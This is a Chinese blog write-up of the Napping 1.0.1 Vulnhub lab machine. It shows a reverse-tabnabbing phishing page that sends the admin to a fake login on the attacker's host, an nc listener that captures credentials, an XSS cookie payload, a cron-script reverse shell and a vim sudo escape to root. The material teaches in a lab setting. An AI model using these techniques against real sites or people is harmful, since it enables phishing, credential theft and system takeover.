Vulnhub 靶机 Napping 1.0.1 write up Reverse Tabnabbing钓鱼 修改root权限的定时py文件 + vim 提权

已于 2022-02-11 11:40:31 修改
阅读量1.6k 收藏 11
点赞数 4
分类专栏: 靶机学习 文章标签: linux 安全 运维
于 2022-01-12 17:09:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YouthBelief/article/details/122408303
版权

Vulnhub 靶机 Napping 1.0.1 write up

0x00 环境准备

  • 下载地址

       https://www.vulnhub.com/entry/napping-101,752/

  • 靶机介绍

      Name: Napping: 1.0.1
  Date release: 22 Oct 2021
  Author: hadrian3689
  Series: Napping
  
  Description
  Even Admins can fall asleep on the job

  • 虚拟机
    Virtualbox 仅主机
    kali也用该网卡

0x01 信息收集

  • ip探测
    在这里插入图片描述
  • 端口服务识别
    在这里插入图片描述

0x02 漏洞挖掘

思路一:80 web漏洞挖掘

手动+扫描器挖
首页为一处登录页面

手工测试点

(1)注册账号后,登录后台挖漏洞
(2)登录处sql注入测试
(3)无登录验证码,可以从登录或注册信息 ,测试是否提示存在的账号,收集到存在的账号进行爆破。
(4)查看源码有无可利用信息。
(5)目录爆破,测试其他页面。

在这里插入图片描述

思路二:22 ssh爆破

hydra爆破root密码,或者获取到其他账号信息后,用来爆破密码。
通过web获取到登录页面的 账号密码,也可以ssh登录试试,一个账号密码 多用很正常。

步骤一:注册账号登录后台

注册账号test 密码 123123
登录成功

在这里插入图片描述

步骤二:后台漏洞探测

(1)从网页信息 Hello, test! Welcome to our free blog promotions site.
Please submit your link so that we can get started. All links will be reviewed by our admin

中得知 该网站是一个 免费博客推广网站,输入链接,管理员会审查,之后进行推广。

绑定http://www.baidu.com测试
在这里插入图片描述

发现 可以利用 Reverse Tabnabbing
(2)可以考虑做钓鱼链接,伪造登录页面, 将获取到的账号密码,传到vps的一处文件中,然后跳转到
如果管理员大意的话,应该会再次输入账号密码。
(3)还有反射型xss 不过用处不大
输入的 \ ’ "等特殊字符会被转义,最后使用
如下payload 闭合标签 反射xss

\123'''></a><script>alert(document.cookie)</script>

在这里插入图片描述

步骤三:钓鱼

(1)保存登录页面
右键-另存为-login.html
(2)准备一个恶意页面diaoyu.html

<!DOCTYPE html>
<html>
<body>
    <script>
      if(window.opener) mainframe.location.replace=('http://192.168.56.137:7777/login.html');
      if(window.opener  != window) mainframe.location.replace=('http://192.168.56.137:7777/login.html');
</script>
</body>
</html>

(3)将保存到的页面和diaoyu.html 放置在kali上
在这里插入图片描述

(4)起一个python http服务

python3 -m http.server 80

在这里插入图片描述
(5)kali 监听 7777端口

nc -lvvp 7777

在这里插入图片描述
(6)等待管理员检查链接。
如果中招,就会在监听的7777端口收到登录信息。

在这里插入图片描述
在这里插入图片描述

username=daniel&password=C%40ughtm3napping123 sent 0, rcvd 275
得到
账号daniel
密码C@ughtm3napping123

步骤四:利用账号登录

(1)后台登录
无效的账号密码
在这里插入图片描述
(2)ssh登录

登录成功
在这里插入图片描述

0x03 提权

步骤五:信息收集

(1)看用户 及组 什么特殊账号

一会儿可关注这些用户组或用户可访问的文件
在这里插入图片描述

在这里插入图片描述

(2)看网站根目录是否存在数据库账号密码 等其他敏感信息

可登录数据库 查看数据 或者 ssh登录尝试

在这里插入图片描述
adrian
P@sswr0d456

先ssh登录 结果失败

登录 数据库后 从website 库中user表
发现一堆加密的账号密码
感觉用处不大,后续 没有其他办法 再去注册页面中看看加密方法进行解密吧。
在这里插入图片描述

(3)看/home 目录下 各最后那个号存在什么可疑文件

在这里插入图片描述
在这里插入图片描述
只有两个用户目录
adrian中 存在 query.py 当前登录的用户所属组可以读写文件 应该可以利用
daniel目录 不存在可疑文件

(4) sudo -l

在这里插入图片描述
该用户不可以sudo
可以想办法从adrian中入手

步骤六:查看query.py文件

(1)因为adrian中 存在 query.py 当前登录的用户所属组可以读写文件 应该可以利用
在这里插入图片描述

该py的大概功能是 请求 靶机主页,如果主页 状态码为200,打开site_status.txt文件 写入站点是正常的 在写入现在的时间。
反之如果状态码不为200,写入请检查站点,以及当前时间。

看到这里 就知道 有定时任务执行该脚本。可以利用定时任务提权
(2)查看 site_status.txt
没两分钟写入一次 说明 定时任务没两分钟执行一次。
在这里插入图片描述

步骤七:利用定时任务反弹adrian用户的shell

(1)在tmp目录添加反弹shell文件

在这里插入图片描述

(2)修改 query.py脚本 加入执行 /tmp/shell.sh 的命令

在这里插入图片描述

(3)定时任务反弹shell成功

在这里插入图片描述

步骤八:sudo -l 提权至root

(1) sudo -l 查看sudo权限

在这里插入图片描述
显示 /usr/bin/vim 无需 密码 就可以 以root权限执行

(2)vim 提权

sudo vim -c ':!/bin/sh'

在这里插入图片描述
在这里插入图片描述
管理员不能保持清醒。

0x04 总结

该靶机根据页面提示信息,以及输出的链接直接显现在网页中,就用 Reverse Tab Nabbing - HackTricks 钓鱼方法(靶机中存在脚本中你的钓鱼页面)获取到账号密码,秉着账号密码多用原则,用该密码尝试ssh登录成功,后续通过定时任务 反弹回 另一账号shell,再根据sudo 配置 vim 无密码可用,反弹回root shell。

看看 靶机中的自动中钓鱼页面的脚本
从数据库中获取到你写入的链接,然后带入账号密码 请求该链接。
在这里插入图片描述
在这里插入图片描述

LuckyCharm~
关注
  • 4
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Reverse Tabnabbing钓鱼
SoulCat
02-27 1418
Reverse Tabnabbing钓鱼 希望你以后能过得好,别辜负我一生不打扰 文章目录Reverse Tabnabbing钓鱼原理:利用:修复: 原理: 使用正常网站A的a标签设置为恶意网站B,恶意网站B中利用window.opener修改原先页面A页面,进而无征兆把访问正常网站A页面修改钓鱼网站C页面。 两个可以利用点: 1、使用a标签,并且target=_blank,没有使用re...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶场】NAPPING: 1.0.1
DG_s1mple
04-01 6049
环境准备 下载靶机导入到vmware 攻击机IP地址为:192.168.2.18 靶机IP地址为:192.168.2.16 信息收集 我们使用nmap扫描一下靶机开放的端口信息 靶机开放了ssh跟http服务 我们首先访问一下他的http服务 是一个登录界面,并且可以注册账号,我们先注册一下 有一个文本框,我们测试一下功能 发现我们输入什么网站,他就跳转到什么网站,这么会存在Tabnabbing攻击 使用正常网站A的a标签设置为恶意网站B,恶意网站B中利用window.opener修改原先页面
Vulnhub项目:NAPPING: 1.0.1
最新发布
Ays.Ie的博客
05-07 738
Vulnhub项目:NAPPING: 1.0.1
Vulnhub靶场】Napping 1.0.1
Nailaoyyds的博客
06-15 906
查看开启端口和服务,登录框可以从弱密码、注册口,子目录,注入等手段入手。 注册账号试试水 登录后发现有跳转点,可以跳转到输入的链接。 先看一下正常链接,发现是可以执行的 利用恶意链接 直接用kali访问该页面。 监听到账号密码 query.py这个py文件是可以执行的,可以在里边写入反弹shell。建立shell文件,导入py文件中执行。文件差不多两分钟自动执行一次。 给shell.sh文件权限。..................
vulnhub——napping-1.0.1靶机
Re1_zf的博客
11-01 1198
首先,创建一个反弹shell的sh文件,这里需要注意路径需要在当前用户目录下,否则没有权限创建文件。大概内容就是只要本地web服务可以正常访问,就每隔两分钟向日志文件中写入当前时间。修改一下py执行文件的内容,使其执行编辑好的反弹shell的脚本。这样的话,借助这个py文件,我们可以尝试向攻击机反弹shell。等待一会儿后会有一个shell反弹过来,同时查看一下权限。这里需要注意一下,返回的数据包需要进行一下URL解码。看一下这个目录下的执行日志,大概就是两分钟执行一次。查找一下这个组有权限运行的程序。
Vulnhub_Napping
qq_45434762的博客
02-13 3313
本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及...
65.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1
08-03
【网络安全自学篇】六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1 本文主要讲述了网络安全中的靶机渗透技术,特别是通过Vulnhub平台进行环境搭建和JIS-CTF挑战。Vulnhub是一个提供虚拟机...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
66.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。第1页 共25页
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
vulnhub靶机Napping1.0.1教程
m0_73248913的博客
07-18 327
vulnhub靶场
渗透测试学习之靶机napping-1.0.1
xdbzdgx的博客
04-30 1153
前期准备 1.下载靶机Napping-1.0.1WebGOAT: 1 ~ VulnHub 1.载入vmware,网络模式设置为NAT kali IP地址为192.168.88.128 靶机 IP地址为192.168.88.129 一 、信息收集 1.使用nnamp扫描器扫描开放的端口 nmap -T4 -sV -p- 192.168.88.129 发现开放了80端口和22远程控制端口 2.寻找web信息 访问后发现需要登录,随即注册账号并登录。 此处..
NAPPING: 1.0.1 Vulnhub靶机
qq_34942239的博客
02-27 626
没有rel=“noopener noreferrer”的情况下使用target=“_blank”是有安全风险,超链接a标签的rel="noopener noreferrer"属性是一种新特性,它能让网站更安全,超链接添加rel="noopener noreferrer"来防止钓鱼网站,因为它获取的window.opener的值为null。显示创建一个html文件,当点击生成的超链接进入这个文件的时候,父窗口会重定向到http://192.168.56.102:6677/2.html。
VulnHub靶场之FoxHole: 1.0.1
A_dmin的博客
10-09 1196
VulnHub靶场之FoxHole: 1.0.1 扫描IP以及端口: 访问web页面,扫描一下目录: 有个phpmyadmin,去看看,只是一张图片,,我透: 继续看看robots.txt,得到一个secret.html,访问,看不懂: 发现还有个admin.html,查看一下,得到提示: Maybe take a nice *deep* look at that one purple fox picture? I dunno. 查看一下images,一堆图片,,,发现有三张紫狐的图片: 图
VulnHub-Napping打靶记录
qq_43534481的博客
08-24 313
Vulnhub Napping靶场 详细通关记录。
vulnhub靶场6:napping
Genarior的专栏
05-16 184
8、find / -group administrators -type f 2>/dev/null 查看有相同权限的文件 ,发现了一个query.py。6、启动python3 -m http.server 80 监听,同步nc -lvvp 8000端口监听,获得了账号密码。10、获得反弹shell,查看sudo可执行命令,可以无需密码root权限执行vim。使用sudo vim 修改/etc/passwd文件添加用户。13、使用sudo vim修改/etc/shadow文件。7、ssh登录,查看权限。
c0ldd靶机(wpscan工具,vim/ftp提权
m0_66299232的博客
11-02 277
把404.php页面代码改为php-reverse-shell.php(github里有),保存后,开启监听。1.成功反弹shell,用python反弹交互式shell。攻击机系统:kali linux 2021.1。2.把用户名写入user.txt暴力破解密码。2.在html目录下配置文件有用户名密码!5.执行下面俩个命令任何一个都可以提权。6.进入root目录,轻松拿下!1.用wpscan枚举网站用户名。2.用gobuster检测目录。虚拟机网络链接模式:桥接模式。3.成功得到用户名密码。wpscan
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。...该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值